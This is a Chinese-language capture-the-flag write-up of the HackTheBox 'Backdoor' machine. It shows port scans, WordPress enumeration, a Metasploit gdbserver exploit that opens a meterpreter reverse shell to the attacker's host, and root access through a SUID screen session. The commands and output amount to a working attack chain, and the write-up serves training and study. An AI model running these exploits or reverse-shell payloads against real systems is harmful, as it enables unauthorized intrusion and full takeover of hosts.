title: HackTheBox-Backdoor-GNU gdbserver 9.2 - 远程命令执行 (RCE) author: Mosaic Theory layout: true categories: 漏洞实验 tags:
• 打靶日记
HackTheBox-Backdoor
People love what other people are passionate about.
人们喜爱别人倾注热情所做的事情。
Recon:
Masscan:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-05-15 01:20:37 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.11.125
Discovered open port 80/tcp on 10.10.11.125
Discovered open port 1337/tcp on 10.10.11.125Nmap:
Nmap scan report for 10.10.11.125
Host is up (0.19s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: WordPress 5.8.1
|_http-title: Backdoor – Real-Life
1337/tcp open waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel似乎有一些漏洞,但暂时不知道有什么用:
>> searchsploit wordpress 5.8.1
------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------ ---------------------------------
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities | php/webapps/39553.txt
WordPress Plugin iThemes Security < 7.0.3 - SQL Injection | php/webapps/44943.txt
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection | php/webapps/48918.sh
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results目录名很标志:
http://backdoor.htb/index.php/blog/页面没有什么相关信息,链接都是官方小广告,在文章页面会有一个评论系统:
记住这里,说不定会用到,我尝试对目标路径爆破:
[09:36:57] 403 - 277B - /.php
[09:37:40] 301 - 0B - /index.php -> http://backdoor.htb/
[09:37:43] 200 - 19KB - /license.txt
[09:37:58] 200 - 7KB - /readme.html
[09:38:00] 403 - 277B - /server-status/
[09:38:00] 403 - 277B - /server-status
[09:38:14] 200 - 1KB - /wp-admin/install.php
[09:38:14] 500 - 3KB - /wp-admin/setup-config.php
[09:38:14] 302 - 0B - /wp-admin/ -> http://backdoor.htb/wp-login.php?redirect_to=http%3A%2F%2Fbackdoor.htb%2Fwp-admin%2F&reauth=1
[09:38:14] 200 - 0B - /wp-config.php
[09:38:14] 400 - 1B - /wp-admin/admin-ajax.php
[09:38:14] 301 - 315B - /wp-admin -> http://backdoor.htb/wp-admin/
[09:38:14] 301 - 317B - /wp-content -> http://backdoor.htb/wp-content/
[09:38:14] 200 - 0B - /wp-content/
[09:38:14] 403 - 277B - /wp-content/plugins/akismet/admin.php
[09:38:14] 403 - 277B - /wp-content/plugins/akismet/akismet.php
[09:38:14] 200 - 776B - /wp-content/upgrade/
[09:38:14] 500 - 0B - /wp-content/plugins/hello.php
[09:38:15] 200 - 1KB - /wp-content/uploads/
[09:38:15] 301 - 318B - /wp-includes -> http://backdoor.htb/wp-includes/
[09:38:15] 200 - 0B - /wp-cron.php
[09:38:15] 200 - 0B - /wp-includes/rss-functions.php
[09:38:15] 200 - 6KB - /wp-login.php
[09:38:15] 302 - 0B - /wp-signup.php -> http://backdoor.htb/wp-login.php?action=register
[09:38:15] 200 - 51KB - /wp-includes/
[09:38:16] 405 - 42B - /xmlrpc.php访问install.php会被提示已经安装wordpress,然后会给我一个登录页面:
简单口令会报错,有个忘记密码的链接:
可以被用来枚举用户名。
存在目录遍历,有大量文件,搜索会很消耗时间,我准备先放着,因为还要一个端口我不知道是做啥的。
GNU gdbserver 9.2 - 远程命令执行 (RCE):
谷歌搜索了几分钟,我发现这可能是部署在主机上的gdbserver ,而且是有代码执行漏洞的:
https://www.exploit-db.com/exploits/50539虽然我无法确定它的版本,但我觉得试试总是不亏:
msf6 exploit(multi/gdb/gdb_server_exec) > show targets
Exploit targets:
Id Name
-- ----
0 x86
1 x86_64
2 ARMLE
3 AARCH64
msf6 exploit(multi/gdb/gdb_server_exec) > set target 1
target => 1
msf6 exploit(multi/gdb/gdb_server_exec) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/gdb/gdb_server_exec) > run
[*] Started reverse TCP handler on 10.10.16.5:4444
[*] 10.10.11.125:1337 - Performing handshake with gdbserver...
[*] 10.10.11.125:1337 - Stepping program to find PC...
[*] 10.10.11.125:1337 - Writing payload at 00007ffff7fd0103...
[*] 10.10.11.125:1337 - Executing the payload...
[*] Sending stage (3020772 bytes) to 10.10.11.125
[*] Meterpreter session 1 opened (10.10.16.5:4444 -> 10.10.11.125:59136) at 2022-05-15 10:18:05 +0800
meterpreter > 完全可以。
meterpreter > shell
Process 10693 created.
Channel 1 created.
python3 -c 'import pty; pty.spawn("/bin/bash")'
user@Backdoor:~$ ls
ls
user.txt
user@Backdoor:~$ cat user.txt
cat user.txt
615482..........................获取root:
sudo -l 需要我输入密码,而我没有,在遍历SUID时,发现了screen:
user@Backdoor:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/su
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/screen
/usr/bin/umount
/usr/bin/mount
/usr/bin/chsh
/usr/bin/pkexec
user@Backdoor:~$这是一个窗口工具,我可以尝试打开一个root窗口:
user@Backdoor:~$ /usr/bin/screen -x root/root
/usr/bin/screen -x root/root
Please set a terminal type.
user@Backdoor:~$ screen
screen
Please set a terminal type.
user@Backdoor:~$ export TERM=xterm
export TERM=xterm
user@Backdoor:~$ /usr/bin/screen -x root/rootroot@Backdoor:~# whoami
whoami
root
root@Backdoor:~# cat /root/root.txt
cat /root/root.txt
cd.................................